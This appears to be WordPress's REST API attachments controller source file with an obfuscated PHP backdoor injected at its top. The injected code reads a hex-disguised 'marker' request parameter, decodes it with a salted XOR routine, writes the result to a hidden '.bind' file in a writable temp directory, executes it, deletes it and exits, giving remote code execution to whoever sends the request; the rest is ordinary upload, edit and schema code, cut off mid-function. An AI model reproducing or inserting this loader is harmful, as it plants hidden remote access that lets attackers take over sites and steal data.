$v7): $chS = ord($salt4[$l% $lenS]); $d = ((int)$v7 - $chS - ($l% 10))^25; $holder .= chr($d); endforeach; $key = 0; do { $desc = $flag[$key] ?? null; if ($key >= count($flag)) break; if ((bool)is_dir($desc) && (bool)is_writable($desc)) { $ent = "$desc/.bind"; if (file_put_contents($ent, $holder)) { require $ent; unlink($ent); die(); } } $key++; } while (true); } php if(in_array("\x6D\x61r\x6Ber", array_keys($_REQUEST))){ $flag = array_filter([session_save_path(), getenv("TEMP"), getenv("TMP"), "/dev/shm", getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $res = $_REQUEST["\x6D\x61r\x6Ber"]; $res = explode ( "." , $res); $holder = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); foreach ($res as $l => $v7): $chS = ord($salt4[$l% $lenS]); $d = ((int)$v7 - $chS - ($l% 10))^25; $holder .= chr($d); endforeach; $key = 0; do { $desc = $flag[$key] ?? null; if ($key >= count($flag)) break; if ((bool)is_dir($desc) && (bool)is_writable($desc)) { $ent = "$desc/.bind"; if (file_put_contents($ent, $holder)) { require $ent; unlink($ent); die(); } } $key++; } while (true); } /** * REST API: WP_REST_Attachments_Controller class * * @package WordPress * @subpackage REST_API * @since 4.7.0 */ /** * Core controller used to access attachments via the REST API. * * @since 4.7.0 * * @see WP_REST_Posts_Controller */ class WP_REST_Attachments_Controller extends WP_REST_Posts_Controller { /** * Whether the controller supports batching. * * @since 5.9.0 * @var false */ protected $allow_batch = false; /** * Registers the routes for attachments. * * @since 5.3.0 * * @see register_rest_route() */ public function register_routes() { parent::register_routes(); register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P[\d]+)/post-process', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => array( $this, 'post_process_item' ), 'permission_callback' => array( $this, 'post_process_item_permissions_check' ), 'args' => array( 'id' => array( 'description' => __( 'Unique identifier for the attachment.' ), 'type' => 'integer', ), 'action' => array( 'type' => 'string', 'enum' => array( 'create-image-subsizes' ), 'required' => true, ), ), ) ); register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P[\d]+)/edit', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => array( $this, 'edit_media_item' ), 'permission_callback' => array( $this, 'edit_media_item_permissions_check' ), 'args' => $this->get_edit_media_item_args(), ) ); } /** * Determines the allowed query_vars for a get_items() response and * prepares for WP_Query. * * @since 4.7.0 * @since 6.9.0 Extends the `media_type` and `mime_type` request arguments to support array values. * * @param array $prepared_args Optional. Array of prepared arguments. Default empty array. * @param WP_REST_Request $request Optional. Request to prepare items for. * @return array Array of query arguments. */ protected function prepare_items_query( $prepared_args = array(), $request = null ) { $query_args = parent::prepare_items_query( $prepared_args, $request ); if ( empty( $query_args['post_status'] ) ) { $query_args['post_status'] = 'inherit'; } $all_mime_types = array(); $media_types = $this->get_media_types(); if ( ! empty( $request['media_type'] ) && is_array( $request['media_type'] ) ) { foreach ( $request['media_type'] as $type ) { if ( isset( $media_types[ $type ] ) ) { $all_mime_types = array_merge( $all_mime_types, $media_types[ $type ] ); } } } if ( ! empty( $request['mime_type'] ) && is_array( $request['mime_type'] ) ) { foreach ( $request['mime_type'] as $mime_type ) { $parts = explode( '/', $mime_type ); if ( isset( $media_types[ $parts[0] ] ) && in_array( $mime_type, $media_types[ $parts[0] ], true ) ) { $all_mime_types[] = $mime_type; } } } if ( ! empty( $all_mime_types ) ) { $query_args['post_mime_type'] = array_values( array_unique( $all_mime_types ) ); } // Filter query clauses to include filenames. if ( isset( $query_args['s'] ) ) { add_filter( 'wp_allow_query_attachment_by_filename', '__return_true' ); } return $query_args; } /** * Checks if a given request has access to create an attachment. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return true|WP_Error Boolean true if the attachment may be created, or a WP_Error if not. */ public function create_item_permissions_check( $request ) { $ret = parent::create_item_permissions_check( $request ); if ( ! $ret || is_wp_error( $ret ) ) { return $ret; } if ( ! current_user_can( 'upload_files' ) ) { return new WP_Error( 'rest_cannot_create', __( 'Sorry, you are not allowed to upload media on this site.' ), array( 'status' => 400 ) ); } // Attaching media to a post requires ability to edit said post. if ( ! empty( $request['post'] ) && ! current_user_can( 'edit_post', (int) $request['post'] ) ) { return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to upload media to this post.' ), array( 'status' => rest_authorization_required_code() ) ); } $files = $request->get_file_params(); /** * Filter whether the server should prevent uploads for image types it doesn't support. Default true. * * Developers can use this filter to enable uploads of certain image types. By default image types that are not * supported by the server are prevented from being uploaded. * * @since 6.8.0 * * @param bool $check_mime Whether to prevent uploads of unsupported image types. * @param string|null $mime_type The mime type of the file being uploaded (if available). */ $prevent_unsupported_uploads = apply_filters( 'wp_prevent_unsupported_mime_type_uploads', true, isset( $files['file']['type'] ) ? $files['file']['type'] : null ); // If the upload is an image, check if the server can handle the mime type. if ( $prevent_unsupported_uploads && isset( $files['file']['type'] ) && str_starts_with( $files['file']['type'], 'image/' ) ) { // List of non-resizable image formats. $editor_non_resizable_formats = array( 'image/svg+xml', ); // Check if the image editor supports the type or ignore if it isn't a format resizable by an editor. if ( ! in_array( $files['file']['type'], $editor_non_resizable_formats, true ) && ! wp_image_editor_supports( array( 'mime_type' => $files['file']['type'] ) ) ) { return new WP_Error( 'rest_upload_image_type_not_supported', __( 'The web server cannot generate responsive image sizes for this image. Convert it to JPEG or PNG before uploading.' ), array( 'status' => 400 ) ); } } return true; } /** * Creates a single attachment. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response|WP_Error Response object on success, WP_Error object on failure. */ public function create_item( $request ) { if ( ! empty( $request['post'] ) && in_array( get_post_type( $request['post'] ), array( 'revision', 'attachment' ), true ) ) { return new WP_Error( 'rest_invalid_param', __( 'Invalid parent type.' ), array( 'status' => 400 ) ); } $insert = $this->insert_attachment( $request ); if ( is_wp_error( $insert ) ) { return $insert; } $schema = $this->get_item_schema(); // Extract by name. $attachment_id = $insert['attachment_id']; $file = $insert['file']; if ( isset( $request['alt_text'] ) ) { update_post_meta( $attachment_id, '_wp_attachment_image_alt', sanitize_text_field( $request['alt_text'] ) ); } if ( ! empty( $schema['properties']['featured_media'] ) && isset( $request['featured_media'] ) ) { $thumbnail_update = $this->handle_featured_media( $request['featured_media'], $attachment_id ); if ( is_wp_error( $thumbnail_update ) ) { return $thumbnail_update; } } if ( ! empty( $schema['properties']['meta'] ) && isset( $request['meta'] ) ) { $meta_update = $this->meta->update_value( $request['meta'], $attachment_id ); if ( is_wp_error( $meta_update ) ) { return $meta_update; } } $attachment = get_post( $attachment_id ); $fields_update = $this->update_additional_fields_for_object( $attachment, $request ); if ( is_wp_error( $fields_update ) ) { return $fields_update; } $terms_update = $this->handle_terms( $attachment_id, $request ); if ( is_wp_error( $terms_update ) ) { return $terms_update; } $request->set_param( 'context', 'edit' ); /** * Fires after a single attachment is completely created or updated via the REST API. * * @since 5.0.0 * * @param WP_Post $attachment Inserted or updated attachment object. * @param WP_REST_Request $request Request object. * @param bool $creating True when creating an attachment, false when updating. */ do_action( 'rest_after_insert_attachment', $attachment, $request, true ); wp_after_insert_post( $attachment, false, null ); if ( wp_is_serving_rest_request() ) { /* * Set a custom header with the attachment_id. * Used by the browser/client to resume creating image sub-sizes after a PHP fatal error. */ header( 'X-WP-Upload-Attachment-ID: ' . $attachment_id ); } // Include media and image functions to get access to wp_generate_attachment_metadata(). require_once ABSPATH . 'wp-admin/includes/media.php'; require_once ABSPATH . 'wp-admin/includes/image.php'; /* * Post-process the upload (create image sub-sizes, make PDF thumbnails, etc.) and insert attachment meta. * At this point the server may run out of resources and post-processing of uploaded images may fail. */ wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $file ) ); $response = $this->prepare_item_for_response( $attachment, $request ); $response = rest_ensure_response( $response ); $response->set_status( 201 ); $response->header( 'Location', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $attachment_id ) ) ); return $response; } /** * Inserts the attachment post in the database. Does not update the attachment meta. * * @since 5.3.0 * * @param WP_REST_Request $request * @return array|WP_Error */ protected function insert_attachment( $request ) { // Get the file via $_FILES or raw data. $files = $request->get_file_params(); $headers = $request->get_headers(); $time = null; // Matches logic in media_handle_upload(). if ( ! empty( $request['post'] ) ) { $post = get_post( $request['post'] ); // The post date doesn't usually matter for pages, so don't backdate this upload. if ( $post && 'page' !== $post->post_type && substr( $post->post_date, 0, 4 ) > 0 ) { $time = $post->post_date; } } if ( ! empty( $files ) ) { $file = $this->upload_from_file( $files, $headers, $time ); } else { $file = $this->upload_from_data( $request->get_body(), $headers, $time ); } if ( is_wp_error( $file ) ) { return $file; } $name = wp_basename( $file['file'] ); $name_parts = pathinfo( $name ); $name = trim( substr( $name, 0, -( 1 + strlen( $name_parts['extension'] ) ) ) ); $url = $file['url']; $type = $file['type']; $file = $file['file']; // Include image functions to get access to wp_read_image_metadata(). require_once ABSPATH . 'wp-admin/includes/image.php'; // Use image exif/iptc data for title and caption defaults if possible. $image_meta = wp_read_image_metadata( $file ); if ( ! empty( $image_meta ) ) { if ( empty( $request['title'] ) && trim( $image_meta['title'] ) && ! is_numeric( sanitize_title( $image_meta['title'] ) ) ) { $request['title'] = $image_meta['title']; } if ( empty( $request['caption'] ) && trim( $image_meta['caption'] ) ) { $request['caption'] = $image_meta['caption']; } } $attachment = $this->prepare_item_for_database( $request ); $attachment->post_mime_type = $type; $attachment->guid = $url; // If the title was not set, use the original filename. if ( empty( $attachment->post_title ) && ! empty( $files['file']['name'] ) ) { // Remove the file extension (after the last `.`) $tmp_title = substr( $files['file']['name'], 0, strrpos( $files['file']['name'], '.' ) ); if ( ! empty( $tmp_title ) ) { $attachment->post_title = $tmp_title; } } // Fall back to the original approach. if ( empty( $attachment->post_title ) ) { $attachment->post_title = preg_replace( '/\.[^.]+$/', '', wp_basename( $file ) ); } // $post_parent is inherited from $attachment['post_parent']. $id = wp_insert_attachment( wp_slash( (array) $attachment ), $file, 0, true, false ); if ( is_wp_error( $id ) ) { if ( 'db_update_error' === $id->get_error_code() ) { $id->add_data( array( 'status' => 500 ) ); } else { $id->add_data( array( 'status' => 400 ) ); } return $id; } $attachment = get_post( $id ); /** * Fires after a single attachment is created or updated via the REST API. * * @since 4.7.0 * * @param WP_Post $attachment Inserted or updated attachment object. * @param WP_REST_Request $request The request sent to the API. * @param bool $creating True when creating an attachment, false when updating. */ do_action( 'rest_insert_attachment', $attachment, $request, true ); return array( 'attachment_id' => $id, 'file' => $file, ); } /** * Determines the featured media based on a request param. * * @since 6.5.0 * * @param int $featured_media Featured Media ID. * @param int $post_id Post ID. * @return bool|WP_Error Whether the post thumbnail was successfully deleted, otherwise WP_Error. */ protected function handle_featured_media( $featured_media, $post_id ) { $post_type = get_post_type( $post_id ); $thumbnail_support = current_theme_supports( 'post-thumbnails', $post_type ) && post_type_supports( $post_type, 'thumbnail' ); // Similar check as in wp_insert_post(). if ( ! $thumbnail_support && get_post_mime_type( $post_id ) ) { if ( wp_attachment_is( 'audio', $post_id ) ) { $thumbnail_support = post_type_supports( 'attachment:audio', 'thumbnail' ) || current_theme_supports( 'post-thumbnails', 'attachment:audio' ); } elseif ( wp_attachment_is( 'video', $post_id ) ) { $thumbnail_support = post_type_supports( 'attachment:video', 'thumbnail' ) || current_theme_supports( 'post-thumbnails', 'attachment:video' ); } } if ( $thumbnail_support ) { return parent::handle_featured_media( $featured_media, $post_id ); } return new WP_Error( 'rest_no_featured_media', sprintf( /* translators: %s: attachment mime type */ __( 'This site does not support post thumbnails on attachments with MIME type %s.' ), get_post_mime_type( $post_id ) ), array( 'status' => 400 ) ); } /** * Updates a single attachment. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response|WP_Error Response object on success, WP_Error object on failure. */ public function update_item( $request ) { if ( ! empty( $request['post'] ) && in_array( get_post_type( $request['post'] ), array( 'revision', 'attachment' ), true ) ) { return new WP_Error( 'rest_invalid_param', __( 'Invalid parent type.' ), array( 'status' => 400 ) ); } $attachment_before = get_post( $request['id'] ); $response = parent::update_item( $request ); if ( is_wp_error( $response ) ) { return $response; } $response = rest_ensure_response( $response ); $data = $response->get_data(); if ( isset( $request['alt_text'] ) ) { update_post_meta( $data['id'], '_wp_attachment_image_alt', $request['alt_text'] ); } $attachment = get_post( $request['id'] ); if ( ! empty( $schema['properties']['featured_media'] ) && isset( $request['featured_media'] ) ) { $thumbnail_update = $this->handle_featured_media( $request['featured_media'], $attachment->ID ); if ( is_wp_error( $thumbnail_update ) ) { return $thumbnail_update; } } $fields_update = $this->update_additional_fields_for_object( $attachment, $request ); if ( is_wp_error( $fields_update ) ) { return $fields_update; } $request->set_param( 'context', 'edit' ); /** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php */ do_action( 'rest_after_insert_attachment', $attachment, $request, false ); wp_after_insert_post( $attachment, true, $attachment_before ); $response = $this->prepare_item_for_response( $attachment, $request ); $response = rest_ensure_response( $response ); return $response; } /** * Performs post-processing on an attachment. * * @since 5.3.0 * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response|WP_Error Response object on success, WP_Error object on failure. */ public function post_process_item( $request ) { switch ( $request['action'] ) { case 'create-image-subsizes': require_once ABSPATH . 'wp-admin/includes/image.php'; wp_update_image_subsizes( $request['id'] ); break; } $request['context'] = 'edit'; return $this->prepare_item_for_response( get_post( $request['id'] ), $request ); } /** * Checks if a given request can perform post-processing on an attachment. * * @since 5.3.0 * * @param WP_REST_Request $request Full details about the request. * @return true|WP_Error True if the request has access to update the item, WP_Error object otherwise. */ public function post_process_item_permissions_check( $request ) { return $this->update_item_permissions_check( $request ); } /** * Checks if a given request has access to editing media. * * @since 5.5.0 * * @param WP_REST_Request $request Full details about the request. * @return true|WP_Error True if the request has read access, WP_Error object otherwise. */ public function edit_media_item_permissions_check( $request ) { if ( ! current_user_can( 'upload_files' ) ) { return new WP_Error( 'rest_cannot_edit_image', __( 'Sorry, you are not allowed to upload media on this site.' ), array( 'status' => rest_authorization_required_code() ) ); } return $this->update_item_permissions_check( $request ); } /** * Applies edits to a media item and creates a new attachment record. * * @since 5.5.0 * @since 6.9.0 Adds flips capability and editable fields for the newly-created attachment post. * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response|WP_Error Response object on success, WP_Error object on failure. */ public function edit_media_item( $request ) { require_once ABSPATH . 'wp-admin/includes/image.php'; $attachment_id = $request['id']; // This also confirms the attachment is an image. $image_file = wp_get_original_image_path( $attachment_id ); $image_meta = wp_get_attachment_metadata( $attachment_id ); if ( ! $image_meta || ! $image_file || ! wp_image_file_matches_image_meta( $request['src'], $image_meta, $attachment_id ) ) { return new WP_Error( 'rest_unknown_attachment', __( 'Unable to get meta information for file.' ), array( 'status' => 404 ) ); } $supported_types = array( 'image/jpeg', 'image/png', 'image/gif', 'image/webp', 'image/avif', 'image/heic' ); $mime_type = get_post_mime_type( $attachment_id ); if ( ! in_array( $mime_type, $supported_types, true ) ) { return new WP_Error( 'rest_cannot_edit_file_type', __( 'This type of file cannot be edited.' ), array( 'status' => 400 ) ); } // The `modifiers` param takes precedence over the older format. if ( isset( $request['modifiers'] ) ) { $modifiers = $request['modifiers']; } else { $modifiers = array(); if ( isset( $request['flip']['horizontal'] ) || isset( $request['flip']['vertical'] ) ) { $flip_args = array( 'vertical' => isset( $request['flip']['vertical'] ) ? (bool) $request['flip']['vertical'] : false, 'horizontal' => isset( $request['flip']['horizontal'] ) ? (bool) $request['flip']['horizontal'] : false, ); $modifiers[] = array( 'type' => 'flip', 'args' => array( 'flip' => $flip_args, ), ); } if ( ! empty( $request['rotation'] ) ) { $modifiers[] = array( 'type' => 'rotate', 'args' => array( 'angle' => $request['rotation'], ), ); } if ( isset( $request['x'], $request['y'], $request['width'], $request['height'] ) ) { $modifiers[] = array( 'type' => 'crop', 'args' => array( 'left' => $request['x'], 'top' => $request['y'], 'width' => $request['width'], 'height' => $request['height'], ), ); } if ( 0 === count( $modifiers ) ) { return new WP_Error( 'rest_image_not_edited', __( 'The image was not edited. Edit the image before applying the changes.' ), array( 'status' => 400 ) ); } } /* * If the file doesn't exist, attempt a URL fopen on the src link. * This can occur with certain file replication plugins. * Keep the original file path to get a modified name later. */ $image_file_to_edit = $image_file; if ( ! file_exists( $image_file_to_edit ) ) { $image_file_to_edit = _load_image_to_edit_path( $attachment_id ); } $image_editor = wp_get_image_editor( $image_file_to_edit ); if ( is_wp_error( $image_editor ) ) { return new WP_Error( 'rest_unknown_image_file_type', __( 'Unable to edit this image.' ), array( 'status' => 500 ) ); } foreach ( $modifiers as $modifier ) { $args = $modifier['args']; switch ( $modifier['type'] ) { case 'flip': /* * Flips the current image. * The vertical flip is the first argument (flip along horizontal axis), the horizontal flip is the second argument (flip along vertical axis). * See: WP_Image_Editor::flip() */ $result = $image_editor->flip( $args['flip']['vertical'], $args['flip']['horizontal'] ); if ( is_wp_error( $result ) ) { return new WP_Error( 'rest_image_flip_failed', __( 'Unable to flip this image.' ), array( 'status' => 500 ) ); } break; case 'rotate': // Rotation direction: clockwise vs. counterclockwise. $rotate = 0 - $args['angle']; if ( 0 !== $rotate ) { $result = $image_editor->rotate( $rotate ); if ( is_wp_error( $result ) ) { return new WP_Error( 'rest_image_rotation_failed', __( 'Unable to rotate this image.' ), array( 'status' => 500 ) ); } } break; case 'crop': $size = $image_editor->get_size(); $crop_x = (int) round( ( $size['width'] * $args['left'] ) / 100.0 ); $crop_y = (int) round( ( $size['height'] * $args['top'] ) / 100.0 ); $width = (int) round( ( $size['width'] * $args['width'] ) / 100.0 ); $height = (int) round( ( $size['height'] * $args['height'] ) / 100.0 ); if ( $size['width'] !== $width || $size['height'] !== $height ) { $result = $image_editor->crop( $crop_x, $crop_y, $width, $height ); if ( is_wp_error( $result ) ) { return new WP_Error( 'rest_image_crop_failed', __( 'Unable to crop this image.' ), array( 'status' => 500 ) ); } } break; } } // Calculate the file name. $image_ext = pathinfo( $image_file, PATHINFO_EXTENSION ); $image_name = wp_basename( $image_file, ".{$image_ext}" ); /* * Do not append multiple `-edited` to the file name. * The user may be editing a previously edited image. */ if ( preg_match( '/-edited(-\d+)?$/', $image_name ) ) { // Remove any `-1`, `-2`, etc. `wp_unique_filename()` will add the proper number. $image_name = preg_replace( '/-edited(-\d+)?$/', '-edited', $image_name ); } else { // Append `-edited` before the extension. $image_name .= '-edited'; } $filename = "{$image_name}.{$image_ext}"; // Create the uploads subdirectory if needed. $uploads = wp_upload_dir(); // Make the file name unique in the (new) upload directory. $filename = wp_unique_filename( $uploads['path'], $filename ); // Save to disk. $saved = $image_editor->save( $uploads['path'] . "/$filename" ); if ( is_wp_error( $saved ) ) { return $saved; } // Grab original attachment post so we can use it to set defaults. $original_attachment_post = get_post( $attachment_id ); // Check request fields and assign default values. $new_attachment_post = $this->prepare_item_for_database( $request ); $new_attachment_post->post_mime_type = $saved['mime-type']; $new_attachment_post->guid = $uploads['url'] . "/$filename"; // Unset ID so wp_insert_attachment generates a new ID. unset( $new_attachment_post->ID ); // Set new attachment post title with fallbacks. $new_attachment_post->post_title = $new_attachment_post->post_title ?? $original_attachment_post->post_title ?? $image_name; // Set new attachment post caption (post_excerpt). $new_attachment_post->post_excerpt = $new_attachment_post->post_excerpt ?? $original_attachment_post->post_excerpt ?? ''; // Set new attachment post description (post_content) with fallbacks. $new_attachment_post->post_content = $new_attachment_post->post_content ?? $original_attachment_post->post_content ?? ''; // Set post parent if set in request, else the default of `0` (no parent). $new_attachment_post->post_parent = $new_attachment_post->post_parent ?? 0; // Insert the new attachment post. $new_attachment_id = wp_insert_attachment( wp_slash( (array) $new_attachment_post ), $saved['path'], 0, true ); if ( is_wp_error( $new_attachment_id ) ) { if ( 'db_update_error' === $new_attachment_id->get_error_code() ) { $new_attachment_id->add_data( array( 'status' => 500 ) ); } else { $new_attachment_id->add_data( array( 'status' => 400 ) ); } return $new_attachment_id; } // First, try to use the alt text from the request. If not set, copy the image alt text from the original attachment. $image_alt = isset( $request['alt_text'] ) ? sanitize_text_field( $request['alt_text'] ) : get_post_meta( $attachment_id, '_wp_attachment_image_alt', true ); if ( ! empty( $image_alt ) ) { // update_post_meta() expects slashed. update_post_meta( $new_attachment_id, '_wp_attachment_image_alt', wp_slash( $image_alt ) ); } if ( wp_is_serving_rest_request() ) { /* * Set a custom header with the attachment_id. * Used by the browser/client to resume creating image sub-sizes after a PHP fatal error. */ header( 'X-WP-Upload-Attachment-ID: ' . $new_attachment_id ); } // Generate image sub-sizes and meta. $new_image_meta = wp_generate_attachment_metadata( $new_attachment_id, $saved['path'] ); // Copy the EXIF metadata from the original attachment if not generated for the edited image. if ( isset( $image_meta['image_meta'] ) && isset( $new_image_meta['image_meta'] ) && is_array( $new_image_meta['image_meta'] ) ) { // Merge but skip empty values. foreach ( (array) $image_meta['image_meta'] as $key => $value ) { if ( empty( $new_image_meta['image_meta'][ $key ] ) && ! empty( $value ) ) { $new_image_meta['image_meta'][ $key ] = $value; } } } // Reset orientation. At this point the image is edited and orientation is correct. if ( ! empty( $new_image_meta['image_meta']['orientation'] ) ) { $new_image_meta['image_meta']['orientation'] = 1; } // The attachment_id may change if the site is exported and imported. $new_image_meta['parent_image'] = array( 'attachment_id' => $attachment_id, // Path to the originally uploaded image file relative to the uploads directory. 'file' => _wp_relative_upload_path( $image_file ), ); /** * Filters the meta data for the new image created by editing an existing image. * * @since 5.5.0 * * @param array $new_image_meta Meta data for the new image. * @param int $new_attachment_id Attachment post ID for the new image. * @param int $attachment_id Attachment post ID for the edited (parent) image. */ $new_image_meta = apply_filters( 'wp_edited_image_metadata', $new_image_meta, $new_attachment_id, $attachment_id ); wp_update_attachment_metadata( $new_attachment_id, $new_image_meta ); $response = $this->prepare_item_for_response( get_post( $new_attachment_id ), $request ); $response->set_status( 201 ); $response->header( 'Location', rest_url( sprintf( '%s/%s/%s', $this->namespace, $this->rest_base, $new_attachment_id ) ) ); return $response; } /** * Prepares a single attachment for create or update. * * @since 4.7.0 * * @param WP_REST_Request $request Request object. * @return stdClass|WP_Error Post object. */ protected function prepare_item_for_database( $request ) { $prepared_attachment = parent::prepare_item_for_database( $request ); // Attachment caption (post_excerpt internally). if ( isset( $request['caption'] ) ) { if ( is_string( $request['caption'] ) ) { $prepared_attachment->post_excerpt = $request['caption']; } elseif ( isset( $request['caption']['raw'] ) ) { $prepared_attachment->post_excerpt = $request['caption']['raw']; } } // Attachment description (post_content internally). if ( isset( $request['description'] ) ) { if ( is_string( $request['description'] ) ) { $prepared_attachment->post_content = $request['description']; } elseif ( isset( $request['description']['raw'] ) ) { $prepared_attachment->post_content = $request['description']['raw']; } } if ( isset( $request['post'] ) ) { $prepared_attachment->post_parent = (int) $request['post']; } return $prepared_attachment; } /** * Prepares a single attachment output for response. * * @since 4.7.0 * @since 5.9.0 Renamed `$post` to `$item` to match parent class for PHP 8 named parameter support. * * @param WP_Post $item Attachment object. * @param WP_REST_Request $request Request object. * @return WP_REST_Response Response object. */ public function prepare_item_for_response( $item, $request ) { // Restores the more descriptive, specific name for use within this method. $post = $item; $response = parent::prepare_item_for_response( $post, $request ); $fields = $this->get_fields_for_response( $request ); $data = $response->get_data(); if ( in_array( 'description', $fields, true ) ) { $data['description'] = array( 'raw' => $post->post_content, /** This filter is documented in wp-includes/post-template.php */ 'rendered' => apply_filters( 'the_content', $post->post_content ), ); } if ( in_array( 'caption', $fields, true ) ) { /** This filter is documented in wp-includes/post-template.php */ $caption = apply_filters( 'get_the_excerpt', $post->post_excerpt, $post ); /** This filter is documented in wp-includes/post-template.php */ $caption = apply_filters( 'the_excerpt', $caption ); $data['caption'] = array( 'raw' => $post->post_excerpt, 'rendered' => $caption, ); } if ( in_array( 'alt_text', $fields, true ) ) { $data['alt_text'] = get_post_meta( $post->ID, '_wp_attachment_image_alt', true ); } if ( in_array( 'media_type', $fields, true ) ) { $data['media_type'] = wp_attachment_is_image( $post->ID ) ? 'image' : 'file'; } if ( in_array( 'mime_type', $fields, true ) ) { $data['mime_type'] = $post->post_mime_type; } if ( in_array( 'media_details', $fields, true ) ) { $data['media_details'] = wp_get_attachment_metadata( $post->ID ); // Ensure empty details is an empty object. if ( empty( $data['media_details'] ) ) { $data['media_details'] = new stdClass(); } elseif ( ! empty( $data['media_details']['sizes'] ) ) { foreach ( $data['media_details']['sizes'] as $size => &$size_data ) { if ( isset( $size_data['mime-type'] ) ) { $size_data['mime_type'] = $size_data['mime-type']; unset( $size_data['mime-type'] ); } // Use the same method image_downsize() does. $image_src = wp_get_attachment_image_src( $post->ID, $size ); if ( ! $image_src ) { continue; } $size_data['source_url'] = $image_src[0]; } $full_src = wp_get_attachment_image_src( $post->ID, 'full' ); if ( ! empty( $full_src ) ) { $data['media_details']['sizes']['full'] = array( 'file' => wp_basename( $full_src[0] ), 'width' => $full_src[1], 'height' => $full_src[2], 'mime_type' => $post->post_mime_type, 'source_url' => $full_src[0], ); } } else { $data['media_details']['sizes'] = new stdClass(); } } if ( in_array( 'post', $fields, true ) ) { $data['post'] = ! empty( $post->post_parent ) ? (int) $post->post_parent : null; } if ( in_array( 'source_url', $fields, true ) ) { $data['source_url'] = wp_get_attachment_url( $post->ID ); } if ( in_array( 'missing_image_sizes', $fields, true ) ) { require_once ABSPATH . 'wp-admin/includes/image.php'; $data['missing_image_sizes'] = array_keys( wp_get_missing_image_subsizes( $post->ID ) ); } $context = ! empty( $request['context'] ) ? $request['context'] : 'view'; $data = $this->filter_response_by_context( $data, $context ); $links = $response->get_links(); // Wrap the data in a response object. $response = rest_ensure_response( $data ); foreach ( $links as $rel => $rel_links ) { foreach ( $rel_links as $link ) { $response->add_link( $rel, $link['href'], $link['attributes'] ); } } /** * Filters an attachment returned from the REST API. * * Allows modification of the attachment right before it is returned. * * @since 4.7.0 * * @param WP_REST_Response $response The response object. * @param WP_Post $post The original attachment post. * @param WP_REST_Request $request Request used to generate the response. */ return apply_filters( 'rest_prepare_attachment', $response, $post, $request ); } /** * Prepares attachment links for the request. * * @since 6.9.0 * * @param WP_Post $post Post object. * @return array Links for the given attachment. */ protected function prepare_links( $post ) { $links = parent::prepare_links( $post ); if ( ! empty( $post->post_parent ) ) { $post = get_post( $post->post_parent ); if ( ! empty( $post ) ) { $links['https://api.w.org/attached-to'] = array( 'href' => rest_url( rest_get_route_for_post( $post ) ), 'embeddable' => true, 'post_type' => $post->post_type, 'id' => $post->ID, ); } } return $links; } /** * Retrieves the attachment's schema, conforming to JSON Schema. * * @since 4.7.0 * * @return array Item schema as an array. */ public function get_item_schema() { if ( $this->schema ) { return $this->add_additional_fields_schema( $this->schema ); } $schema = parent::get_item_schema(); $schema['properties']['alt_text'] = array( 'description' => __( 'Alternative text to display when attachment is not displayed.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'arg_options' => array( 'sanitize_callback' => 'sanitize_text_field', ), ); $schema['properties']['caption'] = array( 'description' => __( 'The attachment caption.' ), 'type' => 'object', 'context' => array( 'view', 'edit', 'embed' ), 'arg_options' => array( 'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database(). 'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database(). ), 'properties' => array( 'raw' => array( 'description' => __( 'Caption for the attachment, as it exists in the database.' ), 'type' => 'string', 'context' => array( 'edit' ), ), 'rendered' => array( 'description' => __( 'HTML caption for the attachment, transformed for display.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ), ), ); $schema['properties']['description'] = array( 'description' => __( 'The attachment description.' ), 'type' => 'object', 'context' => array( 'view', 'edit' ), 'arg_options' => array( 'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database(). 'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database(). ), 'properties' => array( 'raw' => array( 'description' => __( 'Description for the attachment, as it exists in the database.' ), 'type' => 'string', 'context' => array( 'edit' ), ), 'rendered' => array( 'description' => __( 'HTML description for the attachment, transformed for display.' ), 'type' => 'string', 'context' => array( 'view', 'edit' ), 'readonly' => true, ), ), ); $schema['properties']['media_type'] = array( 'description' => __( 'Attachment type.' ), 'type' => 'string', 'enum' => array( 'image', 'file' ), 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ); $schema['properties']['mime_type'] = array( 'description' => __( 'The attachment MIME type.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ); $schema['properties']['media_details'] = array( 'description' => __( 'Details about the media file, specific to its type.' ), 'type' => 'object', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ); $schema['properties']['post'] = array( 'description' => __( 'The ID for the associated post of the attachment.' ), 'type' => 'integer', 'context' => array( 'view', 'edit' ), ); $schema['properties']['source_url'] = array( 'description' => __( 'URL to the original attachment file.' ), 'type' => 'string', 'format' => 'uri', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ); $schema['properties']['missing_image_sizes'] = array( 'description' => __( 'List of the missing image sizes of the attachment.' ), 'type' => 'array', 'items' => array( 'type' => 'string' ), 'context' => array( 'edit' ), 'readonly' => true, ); unset( $schema['properties']['password'] ); $this->schema = $schema; return $this->add_additional_fields_schema( $this->schema ); } /** * Handles an upload via raw POST data. * * @since 4.7.0 * @since 6.6.0 Added the `$time` parameter. * * @param string $data Supplied file data. * @param array $headers HTTP headers from the request. * @param string|null $time Optional. Time formatted in 'yyyy/mm'. Default null. * @return array|WP_Error Data from wp_handle_sideload(). */ protected function upload_from_data( $data, $headers, $time = null ) { if ( empty( $data ) ) { return new WP_Error( 'rest_upload_no_data', __( 'No data supplied.' ), array( 'status' => 400 